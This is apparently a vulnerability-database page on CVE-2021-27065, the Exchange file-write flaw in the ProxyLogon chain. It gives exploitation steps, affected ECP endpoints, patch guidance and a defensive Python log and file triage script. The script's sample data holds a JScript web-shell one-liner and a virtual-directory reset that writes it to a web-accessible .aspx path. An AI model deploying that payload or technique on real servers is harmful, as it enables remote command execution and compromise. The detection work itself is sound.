Planned Fix

CVE-2021-27065

Remote Code Execution in Microsoft Exchange Server

Summary

Microsoft Exchange Server’s ECP and OAB handling contains a post-authentication arbitrary file write flaw. An attacker with authenticated Exchange access can abuse crafted ECP requests and virtual-directory settings to write files to attacker-chosen paths, often dropping a web shell. In the ProxyLogon chain, this vulnerability can be combined with the earlier authentication bypass to reach unauthenticated remote code execution and broader server compromise.

Why Planned Fix?

4/6
Authentication required
Commonly internet-facing deployment
User interaction needed
Exploitable in default configuration
Active exploitation in the wild
High impact vulnerability

Exploitation Details

Type
RCE (Remote Code Execution)
Is exploitable with default configuration?
Yes
Is authentication needed?
Yes
PoC / Exploit
Yes
Impact

Write arbitrary files to attacker-chosen paths, enabling web-shell deployment and code execution

RCE (Remote Code Execution)
Exploitation Requirements
  • Authentication required
Exploitation Process

An attacker first obtains authenticated access to the Exchange server, either with legitimate credentials or by chaining another Exchange bug in the ProxyLogon flow. They then send crafted ECP/DDI requests that manipulate OAB or virtual-directory URL properties so the server writes attacker-controlled content to a chosen path. If the payload is written into a web-accessible location, the attacker requests the dropped file to execute commands and establish a web shell.

Detection Resources
Manual Detection
2
Script Detection
1
Scanner Detection
1

Affected Software

Vendor: Microsoft
Product: Microsoft Exchange Server
Affected Versions: 2013 SP1 and CU21 through CU23, 2016 CU8 through CU19, 2019 RTM through CU8
Description

On-premises Microsoft Exchange Server is an enterprise email, calendaring, and messaging platform for mailboxes, shared calendars, and collaboration.

Deployment: Commonly internet-facing | Protocol: HTTPS | Ports: 443
Affected Component: Exchange Control Panel (ECP) and Offline Address Book (OAB) virtual directory handling, especially ECP DDI requests that modify virtual-directory URL properties.

Affected Endpoints (2)
1. /ecp/DDI/DDIService.svc/SetObject
2. /ecp/DDI/DDIService.svc/GetObject
Remediation
Workaround
Until the update is installed, take the Exchange Control Panel and Offline Address Book virtual directories offline with Microsoft's mitigation tooling (EOMT.ps1 or ExchangeMitigations.ps1). This blocks the ECP DDI requests the attack depends on, but it also removes ECP administration and OAB downloads for users and does not fix the underlying flaw: treat it as a stopgap, not as a substitute for the patch.

www.microsoft.com
Patch
Apply Microsoft security update KB5000871 for the affected Exchange Server cumulative update or service pack, then reboot as required. The package targets specific cumulative updates, so a server on a CU it does not cover must first be moved to a covered CU; install it from an elevated command prompt so that it applies fully, and confirm the build number afterwards. Patching does not remove web shells or accounts an attacker has already planted: on a server that was internet-facing before the update, run the detection checks on this page before treating the host as clean.

support.microsoft.com
Update

Not available

Threat Intelligence
EPSS Score: 94.3% (probability of exploitation in the next 30 days)
EPSS Percentile: 100% (scored higher than every other CVE)

CISA KEV: Listed
Active Exploitation: Active (source: microsoft.com)
Threat Actors (1)
HAFNIUM

China-based state-sponsored group targeting U.S. research, legal, education, defense, policy, and NGO sectors

Detection Rules (2)
Other
ECP server log entries containing `Set-OabVirtualDirectory.ExternalUrl=` or other `Set-.+VirtualDirectory` changes
Yara
WEBSHELL_CVE_2021_27065_Webshells: YARA for small ASPX web shells using `runat="server"` plus `ExternalUrl`/`InternalUrl` strings
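The two rules above, implemented as an added offline triage script for logs and files already collected from a server. This is example code written for this page, not Microsoft's Test-ProxyLogon tooling and not the YARA rule itself. It assumes ';'-delimited fields and uses constructed log lines and file contents; the real ECP server log layout is not reproduced, only the substrings the rules key on. Two additions go beyond the page's rule and are marked in the code: Reset-…VirtualDirectory is matched as well, since the reset operation is what writes the virtual-directory configuration to the chosen path, and a virtual-directory operation naming an .aspx/.ashx/.asmx path is rated critical.

```python
"""Offline triage implementing the two detection rules listed above.

Added example for this page: it is not Microsoft's Test-ProxyLogon
script and not the YARA rule itself. Log lines and file contents are
constructed for the demo; the real ECP server log layout is not
reproduced, only the substrings the rules key on, with ';' assumed as
the field delimiter.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The page's rule is Set-<X>VirtualDirectory. Reset- is matched as well
# (an addition here) because the reset operation is what writes the
# virtual-directory configuration out to the attacker-chosen path.
VDIR_CMDLET_RE = re.compile(r"(?:Re)?Set-[A-Za-z]+VirtualDirectory", re.IGNORECASE)
# URL properties the chain abuses; the value runs to the assumed ';' delimiter.
URL_PROP_RE = re.compile(r"(ExternalUrl|InternalUrl)=([^;]*)", re.IGNORECASE)
# Fragments that never belong in a legitimate OAB/OWA URL (matched lower-cased).
SCRIPT_MARKERS = ("<script", "runat=", "<%", "page language", "eval(", "request[")
# A virtual-directory operation that names a server-side script file is a write.
SCRIPT_FILE_MARKERS = (".aspx", ".ashx", ".asmx")
RUNAT_SERVER_RE = re.compile(r"""runat\s*=\s*["']?server""", re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    cmdlet: str
    prop: Optional[str]
    value: str
    severity: str  # "review": any vdir change; "critical": script in URL or script path


def scan_ecp_log_lines(lines: List[str]) -> List[Hit]:
    """One Hit per line that records a *VirtualDirectory change."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, start=1):
        m = VDIR_CMDLET_RE.search(line)
        if not m:
            continue
        prop, value = None, ""
        pm = URL_PROP_RE.search(line)
        if pm:
            prop, value = pm.group(1), pm.group(2).strip()
        low = line.lower()
        suspicious = any(k in low for k in SCRIPT_MARKERS + SCRIPT_FILE_MARKERS)
        hits.append(Hit(n, m.group(0), prop, value, "critical" if suspicious else "review"))
    return hits


def looks_like_oab_webshell(content: str, max_size: int = 4096) -> bool:
    """The YARA rule's logic: a small file with runat="server" plus the
    ExternalUrl/InternalUrl text that a written OAB config carries."""
    if len(content) > max_size or not RUNAT_SERVER_RE.search(content):
        return False
    low = content.lower()
    return "externalurl" in low or "internalurl" in low


def triage_files(files: Dict[str, str]) -> List[str]:
    """Paths whose content matches the web-shell heuristic, in input order."""
    return [path for path, content in files.items() if looks_like_oab_webshell(content)]


# Constructed ECP log lines (not the real Exchange log format).
SAMPLE_ECP_LOG = [
    "2021-03-02T10:15:02Z;admin@corp.example;"
    "Set-OwaVirtualDirectory.ExternalUrl=https://mail.corp.example/owa;OK",
    "2021-03-02T10:17:44Z;Administrator@corp.example;Set-OabVirtualDirectory.ExternalUrl="
    'http://f/<script language="JScript" runat="server">'
    'function Page_Load(){eval(Request["cmd"],"unsafe")}</script>;OK',
    "2021-03-02T10:17:45Z;Administrator@corp.example;"
    "Reset-OabVirtualDirectory.FilePathName=C:\\inetpub\\wwwroot\\aspnet_client\\help.aspx;OK",
    "2021-03-02T10:18:01Z;user@corp.example;Get-Mailbox;OK",
]

# Constructed file contents, as an IR script would collect them from the server.
SAMPLE_FILES = {
    # the written OAB config: the payload sits in the ExternalUrl property
    "C:\\inetpub\\wwwroot\\aspnet_client\\help.aspx":
        'ExternalUrl : http://f/<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe")}</script>',
    # an ordinary ASPX page: runat="server" but none of the OAB property names
    "C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\default.aspx":
        '<%@ Page Language="C#" %><form runat="server"><asp:Label runat="server" /></form>',
}

if __name__ == "__main__":
    for h in scan_ecp_log_lines(SAMPLE_ECP_LOG):
        print(f"line {h.line_no}: {h.severity:8} {h.cmdlet} {h.prop or '-'} {h.value[:60]}")
    for path in triage_files(SAMPLE_FILES):
        print("web shell candidate:", path)
```

On a live server the equivalent first pass is a Select-String over the ECP server log directory (under the Exchange install path, Logging\ECP\Server) for the same cmdlet pattern. Any "critical" hit should be read as a write attempt: record the path named in the entry and preserve the file there for forensics before any cleanup, since the dropped file is both the web shell and the evidence of how it got there.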

NVD Data


Description Summary

Microsoft Exchange Server Remote Code Execution Vulnerability

CVSS Base Score

7.8
High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

This NVD vector scores the file-write flaw on its own (local vector, user interaction required). It does not reflect the ProxyLogon chain described above, in which the same flaw is reached over HTTPS without credentials and yields remote code execution; prioritise on the exploitation details and threat intelligence on this page rather than on the base score.
CWE: CWE-22 Path Traversal

Affected Software (CPE) (22)

  • cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2013:sp1:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_10:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_11:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_12:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_13:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_8:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:-:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_1:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_2:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*